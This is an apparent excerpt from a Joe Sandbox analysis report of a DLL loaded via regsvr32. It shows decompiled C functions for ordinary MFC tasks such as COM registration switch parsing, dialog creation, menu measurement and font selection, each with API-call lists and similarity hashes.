                                                                                                                • Opcode ID: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
                                                                                                                • Instruction ID: 21b092e1abacb6dd10aba6d3a1ef32e7616c8c6965b8e6eac974718d1555045c
                                                                                                                • Opcode Fuzzy Hash: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
                                                                                                                • Instruction Fuzzy Hash: 7621A43D209601EFE721DF24E802D0FB7E4EF82654F21882DF884A2155EF31AC49DB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E100196B7(void* __ecx, CHAR* _a4) {
                                                                                                                				int _t11;
                                                                                                                				int _t12;
                                                                                                                				void* _t13;
                                                                                                                				void* _t14;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                				void* _t29;
                                                                                                                				void* _t31;
                                                                                                                				void* _t33;
                                                                                                                				CHAR* _t34;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t34 = _a4;
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t11 = lstrcmpA(_t34, "pt");
                                                                                                                				if(_t11 == 0) {
                                                                                                                					 *((intOrPtr*)(_t35 + 0x10)) = 3;
                                                                                                                					return _t11;
                                                                                                                				}
                                                                                                                				_t12 = lstrcmpA(_t34, "p");
                                                                                                                				if(_t12 == 0) {
                                                                                                                					 *((intOrPtr*)(_t35 + 0x10)) = 2;
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				_t13 = E1001286D(_t34, "Register");
                                                                                                                				if(_t13 == 0) {
                                                                                                                					L16:
                                                                                                                					 *((intOrPtr*)(_t35 + 0x10)) = 5;
                                                                                                                					return _t13;
                                                                                                                				}
                                                                                                                				_t13 = E1001286D(_t34, "Regserver");
                                                                                                                				if(_t13 == 0) {
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                				_t14 = E1001286D(_t34, "Unregister");
                                                                                                                				if(_t14 == 0) {
                                                                                                                					L15:
                                                                                                                					 *((intOrPtr*)(_t35 + 0x10)) = 6;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				_t14 = E1001286D(_t34, "Unregserver");
                                                                                                                				_pop(_t29);
                                                                                                                				if(_t14 == 0) {
                                                                                                                					goto L15;
                                                                                                                				}
                                                                                                                				if(lstrcmpA(_t34, "dde") == 0) {
                                                                                                                					_t19 = E10022019(_t29, _t15);
                                                                                                                					 *((intOrPtr*)(_t35 + 0x10)) = 4;
                                                                                                                					return _t19;
                                                                                                                				}
                                                                                                                				_t16 = E1001286D(_t34, "Embedding");
                                                                                                                				_pop(_t31);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_t18 = E10022019(_t31, _t16);
                                                                                                                					 *((intOrPtr*)(_t35 + 8)) = 1;
                                                                                                                					L12:
                                                                                                                					 *(_t35 + 4) =  *(_t35 + 4) & 0x00000000;
                                                                                                                					return _t18;
                                                                                                                				}
                                                                                                                				_t17 = E1001286D(_t34, "Automation");
                                                                                                                				_pop(_t33);
                                                                                                                				if(_t17 == 0) {
                                                                                                                					_t18 = E10022019(_t33, _t17);
                                                                                                                					 *((intOrPtr*)(_t35 + 0xc)) = 1;
                                                                                                                					goto L12;
                                                                                                                				}
                                                                                                                				return _t17;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • lstrcmpA.KERNEL32(?,1009C800), ref: 100196CC
                                                                                                                • lstrcmpA.KERNEL32(?,1009C7FC), ref: 100196E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmp
                                                                                                                • String ID: Automation$Embedding$Register$Regserver$Unregister$Unregserver$dde
                                                                                                                • API String ID: 1534048567-1547061805
                                                                                                                • Opcode ID: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
                                                                                                                • Instruction ID: 79a62cdd177f1b5dfa4b217553fad06d89059955d199f48fdbc3c6dc5129af43
                                                                                                                • Opcode Fuzzy Hash: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
                                                                                                                • Instruction Fuzzy Hash: BD21B47641C702AAF624DEF2ACC5F6BA2ECEF41359F20041EF906AA0C1EF75E4D56611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadClassStg.OLE32(?,?), ref: 1000A415
                                                                                                                • ReadFmtUserTypeStg.OLE32(?,?,?), ref: 1000A431
                                                                                                                • OleRegGetUserType.OLE32(?,00000001,?), ref: 1000A444
                                                                                                                • WriteClassStg.OLE32(?,?), ref: 1000A45C
                                                                                                                • WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A472
                                                                                                                • SetConvertStg.OLE32(?,00000001), ref: 1000A47E
                                                                                                                • WriteClassStg.OLE32(?,?), ref: 1000A490
                                                                                                                • WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A499
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A4AC
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A4B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TypeUserWrite$Class$FreeReadTask$Convert
                                                                                                                • String ID:
                                                                                                                • API String ID: 2659014025-0
                                                                                                                • Opcode ID: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
                                                                                                                • Instruction ID: 441097951dd2468e5e3aeabd33f44de0db15768635f554f72f32f7408884e4a5
                                                                                                                • Opcode Fuzzy Hash: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
                                                                                                                • Instruction Fuzzy Hash: CA21F77590012EAFEF01DFA5CD849EEBBF9FF4A290F550166E500F2110DB759A46CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1001BC23(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t74;
                                                                                                                				struct HWND__* _t75;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t103;
                                                                                                                				signed int _t110;
                                                                                                                				void* _t124;
                                                                                                                				signed int _t129;
                                                                                                                				DLGTEMPLATE* _t130;
                                                                                                                				struct HWND__* _t131;
                                                                                                                				void* _t132;
                                                                                                                
                                                                                                                				_t128 = __esi;
                                                                                                                				_t124 = __edx;
                                                                                                                				_t104 = __ecx;
                                                                                                                				_push(0x3c);
                                                                                                                				E10047680(0x1008f034, __ebx, __edi, __esi);
                                                                                                                				_t103 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                                				_t136 =  *(_t132 + 0x10);
                                                                                                                				if( *(_t132 + 0x10) == 0) {
                                                                                                                					 *(_t132 + 0x10) =  *(E1001E302(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                                				}
                                                                                                                				_t129 =  *(E1001E302(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                                				 *(_t132 - 0x28) = _t129;
                                                                                                                				 *(_t132 - 0x14) = 0;
                                                                                                                				 *(_t132 - 4) = 0;
                                                                                                                				E100172B0(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                                				E100172B0(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                                				if(_t129 == 0) {
                                                                                                                					_t130 =  *(_t132 + 8);
                                                                                                                					L7:
                                                                                                                					__eflags = _t130;
                                                                                                                					if(_t130 == 0) {
                                                                                                                						L4:
                                                                                                                						_t65 = 0;
                                                                                                                						L32:
                                                                                                                						return E10047725(_t65);
                                                                                                                					}
                                                                                                                					L1000140B(_t132 - 0x1c, E100184C0());
                                                                                                                					 *(_t132 - 4) = 1;
                                                                                                                					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                					__eflags = E1002A6E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                                					__eflags =  *0x100bdccc; // 0x0
                                                                                                                					_t72 = 0 | __eflags == 0x00000000;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L14:
                                                                                                                						__eflags = _t72;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L17:
                                                                                                                							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                                							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                                							E1001628E(0, __eflags, _t103);
                                                                                                                							_t74 =  *(_t132 + 0xc);
                                                                                                                							__eflags = _t74;
                                                                                                                							if(_t74 != 0) {
                                                                                                                								_t75 =  *(_t74 + 0x20);
                                                                                                                							} else {
                                                                                                                								_t75 = 0;
                                                                                                                							}
                                                                                                                							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1001B5C0, 0);
                                                                                                                							L100013E3( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                                							_t110 =  *(_t132 - 0x28);
                                                                                                                							__eflags = _t110;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                                								__eflags = _t131;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t78 = E10014092(_t103, 0, __eflags);
                                                                                                                							__eflags = _t78;
                                                                                                                							if(_t78 == 0) {
                                                                                                                								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                                							}
                                                                                                                							__eflags = _t131;
                                                                                                                							if(_t131 != 0) {
                                                                                                                								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                                								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                                									DestroyWindow(_t131);
                                                                                                                									_t131 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							__eflags =  *(_t132 - 0x14);
                                                                                                                							if( *(_t132 - 0x14) != 0) {
                                                                                                                								GlobalUnlock( *(_t132 - 0x14));
                                                                                                                								GlobalFree( *(_t132 - 0x14));
                                                                                                                							}
                                                                                                                							__eflags = _t131;
                                                                                                                							_t59 = _t131 != 0;
                                                                                                                							__eflags = _t59;
                                                                                                                							_t65 = 0 | _t59;
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						L15:
                                                                                                                						E1002A662(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                                						 *(_t132 - 4) = 2;
                                                                                                                						E1002A5C0(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                                						 *(_t132 - 0x14) = E1002A0EA(_t132 - 0x38);
                                                                                                                						 *(_t132 - 4) = 1;
                                                                                                                						E1002A0DC(_t132 - 0x38);
                                                                                                                						__eflags =  *(_t132 - 0x14);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					__eflags = _t72;
                                                                                                                					if(_t72 != 0) {
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					__eflags = GetSystemMetrics(0x2a);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t95 = E1001BBE2(_t103, _t132 - 0x1c, _t124, 0, _t130, _t132, "MS Shell Dlg");
                                                                                                                					__eflags = _t95;
                                                                                                                					_t72 = 0 | _t95 == 0x00000000;
                                                                                                                					__eflags = _t72;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                                					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                                						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                					}
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                				_push(_t132 - 0x48);
                                                                                                                				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                                					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				goto L4;
                                                                                                                			}
















                                                                                                                0x1001bd61
                                                                                                                0x1001bd7f
                                                                                                                0x1001bd81
                                                                                                                0x1001bd86
                                                                                                                0x1001bda8
                                                                                                                0x1001bdab
                                                                                                                0x1001bdad
                                                                                                                0x1001bdb5
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdba
                                                                                                                0x1001bdc1
                                                                                                                0x1001bdc1
                                                                                                                0x1001bdba
                                                                                                                0x1001bdc7
                                                                                                                0x1001bdcc
                                                                                                                0x1001bdce
                                                                                                                0x1001bdd4
                                                                                                                0x1001bdd4
                                                                                                                0x1001bdda
                                                                                                                0x1001bddc
                                                                                                                0x1001bdde
                                                                                                                0x1001bde2
                                                                                                                0x1001bde5
                                                                                                                0x1001bdeb
                                                                                                                0x1001bdeb
                                                                                                                0x1001bdeb
                                                                                                                0x1001bde2
                                                                                                                0x1001bded
                                                                                                                0x1001bdf0
                                                                                                                0x1001bdf5
                                                                                                                0x1001bdfe
                                                                                                                0x1001bdfe
                                                                                                                0x1001be06
                                                                                                                0x1001be08
                                                                                                                0x1001be08
                                                                                                                0x1001be08
                                                                                                                0x00000000
                                                                                                                0x1001be08
                                                                                                                0x1001bd0d
                                                                                                                0x1001bd11
                                                                                                                0x1001bd1c
                                                                                                                0x1001bd20
                                                                                                                0x1001bd30
                                                                                                                0x1001bd33
                                                                                                                0x1001bd37
                                                                                                                0x1001bd3c
                                                                                                                0x1001bd3f
                                                                                                                0x1001bd4a
                                                                                                                0x1001bd4a
                                                                                                                0x00000000
                                                                                                                0x1001bd3f
                                                                                                                0x1001bcd5
                                                                                                                0x1001bcd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bce1
                                                                                                                0x1001bce3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bced
                                                                                                                0x1001bcf4
                                                                                                                0x1001bcf9
                                                                                                                0x1001bcfb
                                                                                                                0x1001bcfd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bcff
                                                                                                                0x1001bd04
                                                                                                                0x1001bd06
                                                                                                                0x1001bd06
                                                                                                                0x00000000
                                                                                                                0x1001bd04
                                                                                                                0x1001bc71
                                                                                                                0x1001bc7c
                                                                                                                0x1001bc93
                                                                                                                0x00000000
                                                                                                                0x1001bc93
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001BC2A
                                                                                                                • GetSystemMetrics.USER32 ref: 1001BCDB
                                                                                                                • GlobalLock.KERNEL32 ref: 1001BD44
                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,1001B5C0,00000000), ref: 1001BD73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                • String ID: MS Shell Dlg
                                                                                                                • API String ID: 1736106359-76309092
                                                                                                                • Opcode ID: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
                                                                                                                • Instruction ID: e85eb02237999a7012c7b0064b89368cd0961b399c4234c762095ab2dcff7244
                                                                                                                • Opcode Fuzzy Hash: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
                                                                                                                • Instruction Fuzzy Hash: 4A51DC309006099BCB09DFA8C8859EEBBB5EF45340F254569F941EF192EB34DE80CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001EB7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t44;
                                                                                                                				int _t53;
                                                                                                                				intOrPtr _t58;
                                                                                                                				int _t60;
                                                                                                                				void* _t63;
                                                                                                                				void* _t72;
                                                                                                                				void* _t88;
                                                                                                                				intOrPtr _t90;
                                                                                                                				struct tagMENUITEMINFOA _t92;
                                                                                                                				intOrPtr _t97;
                                                                                                                				void* _t98;
                                                                                                                
                                                                                                                				_t88 = __edx;
                                                                                                                				_push(0x64);
                                                                                                                				_t44 = E1004764D(0x1008f3dd, __ebx, __edi, __esi);
                                                                                                                				_t72 = __ecx;
                                                                                                                				_t97 =  *((intOrPtr*)(_t98 + 8));
                                                                                                                				_t90 =  *((intOrPtr*)(_t97 + 0x14));
                                                                                                                				if(_t90 != 0) {
                                                                                                                					L1000140B(_t98 + 8, E100184C0());
                                                                                                                					 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                                					GetObjectA( *(_t90 + 4), 0x18, _t98 - 0x40);
                                                                                                                					 *(_t98 - 0x10) =  *((intOrPtr*)(_t98 - 0x38)) + 2;
                                                                                                                					if(GetSystemMetrics(0xf) <=  *(_t98 - 0x10)) {
                                                                                                                						_t53 =  *(_t98 - 0x10);
                                                                                                                					} else {
                                                                                                                						_t53 = GetSystemMetrics(0xf);
                                                                                                                					}
                                                                                                                					_t92 = 0x30;
                                                                                                                					 *(_t97 + 0x10) = _t53;
                                                                                                                					E10049170(_t92, _t98 - 0x70, 0, _t92);
                                                                                                                					 *(_t98 - 0x70) = _t92;
                                                                                                                					 *((intOrPtr*)(_t98 - 0x6c)) = 0x40;
                                                                                                                					if(GetMenuItemInfoA( *(_t72 + 4),  *(_t97 + 8), 0, _t98 - 0x70) != 0) {
                                                                                                                						_t58 = L100011F4(_t98 + 8,  *((intOrPtr*)(_t98 - 0x48)));
                                                                                                                						 *((intOrPtr*)(_t98 - 0x48)) =  *((intOrPtr*)(_t98 - 0x48)) + 1;
                                                                                                                						 *((intOrPtr*)(_t98 - 0x4c)) = _t58;
                                                                                                                						_t60 = GetMenuItemInfoA( *(_t72 + 4),  *(_t97 + 8), 0, _t98 - 0x70);
                                                                                                                						_t94 = _t60;
                                                                                                                						E1000FED3(_t98 + 8, 0xffffffff);
                                                                                                                						_t105 = _t60;
                                                                                                                						if(_t60 != 0) {
                                                                                                                							_push(0);
                                                                                                                							L1000CDFE(_t72, _t98 - 0x28, _t94, _t97, _t105);
                                                                                                                							_t73 = _t72 + 8;
                                                                                                                							 *(_t98 - 4) = 1;
                                                                                                                							_t63 = E1000D180(_t98 - 0x28, _t72 + 8);
                                                                                                                							E1001E5E1(_t98 - 0x28, _t98 - 0x14, _t98 + 8);
                                                                                                                							E1000D180(_t98 - 0x28, _t63);
                                                                                                                							_t38 =  *((intOrPtr*)(_t98 - 0x3c)) + 5; // 0x5
                                                                                                                							 *((intOrPtr*)(_t97 + 0xc)) =  *((intOrPtr*)(_t98 - 0x14)) + _t38;
                                                                                                                							 *(_t98 - 4) = 0;
                                                                                                                							L1000CE52(_t72 + 8, _t98 - 0x28, _t63, _t97, _t73);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t44 = L100013E3( *((intOrPtr*)(_t98 + 8)) + 0xfffffff0, _t88);
                                                                                                                				}
                                                                                                                				return E10047725(_t44);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenuMetricsSystem$H_prolog3Object_memset
                                                                                                                • String ID: @
                                                                                                                • API String ID: 787892162-2766056989
                                                                                                                • Opcode ID: 4f0dc529519df66b90fbddec5008491fbcebfbe0435278c1ac25511a20f02242
                                                                                                                • Instruction ID: b4ddfc55109ff15101dbaac637e92cf7cf6d8893634dfa4a76668b402afad949
                                                                                                                • Opcode Fuzzy Hash: 4f0dc529519df66b90fbddec5008491fbcebfbe0435278c1ac25511a20f02242
                                                                                                                • Instruction Fuzzy Hash: B8316B75900209ABDB10DFA4CD81FEEBBB8FF54354F144129F515AB292EB70AA46CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001593A(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t12;
                                                                                                                				void* _t14;
                                                                                                                				void* _t15;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                				void* _t29;
                                                                                                                				struct HWND__* _t30;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t37;
                                                                                                                				void* _t41;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t29 = __ebx;
                                                                                                                				_push(__ecx);
                                                                                                                				_t37 = __ecx;
                                                                                                                				_t12 = E10015912(__ebx, __ecx, __ecx);
                                                                                                                				_t34 = _a4 & 0x0000fff0;
                                                                                                                				_t41 = _t12;
                                                                                                                				_t14 = _t34 - 0xf040;
                                                                                                                				if(_t14 == 0) {
                                                                                                                					L11:
                                                                                                                					if(_a8 != 0x75 || _t41 == 0) {
                                                                                                                						L15:
                                                                                                                						_t15 = 0;
                                                                                                                						goto L16;
                                                                                                                					} else {
                                                                                                                						E1001799A(_t41);
                                                                                                                						L14:
                                                                                                                						_t15 = 1;
                                                                                                                						L16:
                                                                                                                						return _t15;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t18 = _t14 - 0x10;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t19 = _t18 - 0x10;
                                                                                                                				if(_t19 == 0 || _t19 == 0xa0) {
                                                                                                                					if(_t34 == 0xf060 || _a8 != 0) {
                                                                                                                						if(_t41 != 0) {
                                                                                                                							_push(_t29);
                                                                                                                							_t30 =  *(_t37 + 0x20);
                                                                                                                							_v8 = GetFocus();
                                                                                                                							E10013FEA(_t30, _t34, _t44, SetActiveWindow( *(_t41 + 0x20)));
                                                                                                                							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
                                                                                                                							if(IsWindow(_t30) != 0) {
                                                                                                                								SetActiveWindow(_t30);
                                                                                                                							}
                                                                                                                							if(IsWindow(_v8) != 0) {
                                                                                                                								SetFocus(_v8);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L14;
                                                                                                                				} else {
                                                                                                                					goto L15;
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveFocus$MessageSend
                                                                                                                • String ID: u
                                                                                                                • API String ID: 1556911595-4067256894
                                                                                                                • Opcode ID: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
                                                                                                                • Instruction ID: 07e167e0145e98c525f9007698f833c98e51d59fe92ab2647bdf042b11ac3786
                                                                                                                • Opcode Fuzzy Hash: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
                                                                                                                • Instruction Fuzzy Hash: A011E632900215EBEB10EB75CD05AAE7EA9EF443B2F044126ED46DE161D636DD80DBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1002A5C0(intOrPtr __ecx, signed int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v40;
                                                                                                                				void _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t12;
                                                                                                                				void* _t14;
                                                                                                                				char* _t23;
                                                                                                                				void* _t29;
                                                                                                                				signed short _t30;
                                                                                                                				struct HDC__* _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t12 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t12 ^ _t32;
                                                                                                                				_t31 = GetStockObject;
                                                                                                                				_t30 = 0xa;
                                                                                                                				_v72 = __ecx;
                                                                                                                				_t23 = "System";
                                                                                                                				_t14 = GetStockObject(0x11);
                                                                                                                				if(_t14 != 0) {
                                                                                                                					L2:
                                                                                                                					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                                						_t23 =  &_v40;
                                                                                                                						_t31 = GetDC(0);
                                                                                                                						if(_v68 < 0) {
                                                                                                                							_v68 =  ~_v68;
                                                                                                                						}
                                                                                                                						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                                						ReleaseDC(0, _t31);
                                                                                                                					}
                                                                                                                					L6:
                                                                                                                					_t16 = _a4;
                                                                                                                					if(_a4 == 0) {
                                                                                                                						_t16 = _t30 & 0x0000ffff;
                                                                                                                					}
                                                                                                                					return E1004763E(E1002A471(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                				}
                                                                                                                				_t14 = GetStockObject(0xd);
                                                                                                                				if(_t14 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				goto L2;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000011), ref: 1002A5E6
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 1002A5EE
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002A5FB
                                                                                                                • GetDC.USER32(00000000), ref: 1002A60A
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A61E
                                                                                                                • MulDiv.KERNEL32 ref: 1002A62A
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002A636
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                • String ID: System
                                                                                                                • API String ID: 46613423-3470857405
